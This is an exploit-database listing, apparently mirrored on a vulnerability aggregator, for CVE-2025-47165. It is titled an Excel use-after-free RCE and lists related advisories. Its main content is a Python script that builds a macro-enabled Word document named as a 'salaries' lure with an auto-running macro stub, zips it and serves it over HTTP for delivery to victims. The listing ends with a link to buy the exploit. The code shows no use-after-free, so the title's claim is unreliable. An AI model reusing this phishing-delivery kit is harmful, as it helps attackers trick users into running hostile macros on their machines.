Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)

🗓️ 26 Jun 2025 00:00:00Reported by nu11secur1tyType

exploitdb🔗 www.exploit-db.com👁 357 Views

Microsoft Excel 2024 vulnerability allows remote code execution via malicious DOCM files.

Reporter	Title	Published	Views	Family All 26
Circl	CVE-2025-47165	10 Jun 202515:24	–	circl
CNNVD	Microsoft Excel 资源管理错误漏洞	10 Jun 202500:00	–	cnnvd
CNVD	Microsoft Excel Code Execution Vulnerability (CNVD-2025-13266)	13 Jun 202500:00	–	cnvd
CVE	CVE-2025-47165	10 Jun 202517:02	–	cve
Cvelist	CVE-2025-47165 Microsoft Excel Remote Code Execution Vulnerability	10 Jun 202517:02	–	cvelist
EUVD	EUVD-2025-17734	3 Oct 202520:07	–	euvd
Microsoft KB	Description of the security update for Office Online Server: June 10, 2025 (KB5002728)	10 Jun 202507:00	–	mskb
Microsoft KB	Description of the security update for Excel 2016: June 10, 2025 (KB5002735)	10 Jun 202507:00	–	mskb
Kaspersky	KLA84759 Multiple vulnerabilities in Microsoft Office	10 Jun 202500:00	–	kaspersky
Tenable Nessus	Security Updates for Microsoft Office Products (June 2025) (macOS)	10 Jun 202500:00	–	nessus

# Exploit Title: Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)
# Author: nu11secur1ty
# Date: 06/24/2025
# Vendor: Microsoft
# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
# Reference:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47165
# CVE: CVE-2025-47165
# Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021,
Microsoft 365 Apps for Enterprise

# Description:
The attacker can trick any user into opening and executing their code by
sending a malicious DOCM file via email or a streaming server. After the
execution of the victim, his machine can be infected or even worse than
ever; this could be the end of his Windows machine! WARNING: AMPOTATE THE
MACROS OPTIONS FROM YOUR OFFICE 365!!!

#!/usr/bin/python

import os
import sys
import pythoncom
from win32com.client import Dispatch
import http.server
import socketserver
import socket
import threading
import zipfile

PORT = 8000
DOCM_FILENAME = "salaries.docm"
ZIP_FILENAME = "salaries.zip"
DIRECTORY = "."

def create_docm_with_macro(filename=DOCM_FILENAME):
    pythoncom.CoInitialize()
    word = Dispatch("Word.Application")
    word.Visible = False

    try:
        doc = word.Documents.Add()
        vb_project = doc.VBProject
        vb_component = vb_project.VBComponents("ThisDocument")

        macro_code = '''
Sub AutoOpen()
      //YOUR EXPLOIT HERE
      // All OF YPU PLEASE WATCH THE DEMO VIDEO
      // Best Regards to packetstorm.news and OFFSEC
End Sub
'''

        vb_component.CodeModule.AddFromString(macro_code)

        doc.SaveAs(os.path.abspath(filename), FileFormat=13)
        print(f"[+] Macro-enabled Word document created: {filename}")

    except Exception as e:
        print(f"[!] Error creating document: {e}")
    finally:
        doc.Close(False)
        word.Quit()
        pythoncom.CoUninitialize()

def zip_docm(docm_path, zip_path):
    with zipfile.ZipFile(zip_path, 'w', compression=zipfile.ZIP_DEFLATED)
as zipf:
        zipf.write(docm_path, arcname=os.path.basename(docm_path))
    print(f"[+] Created ZIP archive: {zip_path}")

def get_local_ip():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(("8.8.8.8", 80))
        ip = s.getsockname()[0]
    except Exception:
        ip = "127.0.0.1"
    finally:
        s.close()
    return ip

class Handler(http.server.SimpleHTTPRequestHandler):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, directory=DIRECTORY, **kwargs)

def run_server():
    ip = get_local_ip()
    print(f"[+] Starting HTTP server on http://{ip}:{PORT}")
    print(f"[+] Place your macro docm and zip files in this directory to
serve them.")
    print(f"[+] Access the ZIP file at: http://{ip}:{PORT}/{ZIP_FILENAME}")
    with socketserver.TCPServer(("", PORT), Handler) as httpd:
        print("[+] Server running, press Ctrl+C to stop")
        httpd.serve_forever()

if __name__ == "__main__":
    if os.name != "nt":
        print("[!] This script only runs on Windows with MS Word
installed.")
        sys.exit(1)

    print("[*] Creating the macro-enabled document...")
    create_docm_with_macro(DOCM_FILENAME)

    print("[*] Creating ZIP archive of the document...")
    zip_docm(DOCM_FILENAME, ZIP_FILENAME)

    print("[*] Starting HTTP server in background thread...")
    server_thread = threading.Thread(target=run_server, daemon=True)
    server_thread.start()

    try:
        while True:
            pass  # Keep main thread alive
    except KeyboardInterrupt:
        print("\n[!] Server stopped by user.")


```

# Reproduce:
[href](https://www.youtube.com/watch?v=CSb76-OG-Tg)

# Buy an exploit only:
[href](https://satoshidisk.com/pay/COiBVA)

# Time spent:
01:37:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>




-- 

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

26 Jun 2025 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 3.17.8

EPSS0.01019

SSVC